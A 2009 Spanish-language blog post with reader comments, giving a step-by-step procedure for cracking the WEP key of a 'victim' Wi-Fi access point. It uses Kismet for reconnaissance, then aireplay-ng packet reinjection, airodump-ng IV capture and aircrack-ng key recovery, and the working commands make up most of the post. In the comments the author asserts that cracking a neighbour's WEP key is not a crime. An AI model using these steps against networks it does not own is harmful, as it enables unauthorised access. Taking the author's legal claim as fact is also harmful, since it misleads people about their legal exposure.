Blog de Javier Castañón – JavCastaPosts RSS Comments RSS

« »

Cracking WEP

Posted in Scripting, Sistemas, Utilidades, hacking on Aug 24th, 2009

Un mini procedimiento de como reventaba las llaves WEP de encriptación de un AP wifi (tiempos aquellos … ):

* Incio backtrack

BackTrack

dragon

BacTrack=Distro de linux en liveCD o en pendrive especializada en auditoria de seguridad
* Levanto la tarjeta wifi, desde shell
Si usas como yo una tarjeta wifi-usb. Seguramente al inicio estará en estado down:
…# ifconfig rausb0 up
* Inicio Kismet
Kismet=Detector de redes de capa 2 o enlace de datos para wireless y sniffer
- apunto el BSSID de la victima, p.e: 00:01:38:XX:XX:XX:6D y su canal p.e canal 6
- apunto  la mac de un cliente asociado al ap, p.e: 00:1D:E0:22:2A:17
* cierro kismet.
* pongo la tarjeta en modo monitor ( promiscuo) desde shell
…# iwconfig rausb0 mode monitor
* Inicio aireplay para reinyectar paquetes y tardar poco … con ataque tipo -3 suele funcionar
# aireplay-ng -3 -b 00:01:38:XX:XX:XX:6D -h 00:1D:E0:22:2A:17 rausb0
* inicio airodump para capturar fichero de ivs
# airodump-ng –ivs -w nombre_fichero_ivs –channel 6 -bssid 00:01:38:XX:XX:XX:6D rausb0
* Si el ap no está muy lejos y el ataque de reinyección tiene exito cuando empiezo a llevar
500.000 paquetes capturados ( con 800.000 y hasta 2.000.000 pueden hacer falta)  lanzo aircrack
…# aircrack-ng nombre_fichero_ivs

Y voila. Una vez que se tiene sobre 10^6 paquetes craquear la key de 128 puede llevar entre 20″ a 1hora. Todo depende :-)

  • Share/Bookmark

Clika en el altavoz para oir el postAltavoz

Necesito trabajo, si tienes una propuesta de trabajo mail-me to: trabajo.job@javcasta.com

Soy técnico de sistemas, comunicaciones y soporte informático. (CV online). Formación

– realizo scripts por encargo. ver CustomScript

5 Responses to “Cracking WEP”

  1. on 24 Aug 2009 at 14:541Bitacoras.com

    Información Bitacoras.com…

    Valora en Bitacoras.com: Un mini procedimiento de como reventaba las llaves WEP de encriptación de un AP wifi (tiempos aquellos … ): * Incio backtrack BacTrack=Distro de linux en liveCD o en pendrive especializada en auditoria de seguridad http://www…..

  2. on 24 Aug 2009 at 15:152azureus (1 comments)

    Lo mejor es dejar mucho rato capturando paquetes.
    saludos

  3. on 24 Aug 2009 at 15:223lainon (115 comments)

    Ahí, induciendo al delito… XD

  4. on 24 Aug 2009 at 16:014javcasta (449 comments)

    Enseñar a disparar no es lo mismo que hacer apologia del asesinato. Incluso disparar sirve para autodefensa (crakear tu propio AP encriptado con WEP es un ejercicio de auditoria de seguridad muy recomendable para que la gente se de cuenta de su fragilidad y se pase a WPA).
    Y para aclarar conceptos. Romper una llave de encriptación wep de un AP no es delito (capa 2). El aire es un medio compartido, no estas pinchando ningun cable, luego capturar los paquetes encriptados del medio es como coger sol … . El delito seria introducirse en la red de ese AP y con una IP (capa 3) hacer uso de los recursos de esa red y/o apropiarse de información de esa red.
    La diferencia es más que sutil.

  5. on 24 Aug 2009 at 18:185lainon (115 comments)

    Ya, jeje, como es obvio era broma… ;)

Leave a Reply

Los enlaces en los comentarios pueden encontrarse libres de nofollow.

Powered by WP Hashcash

?>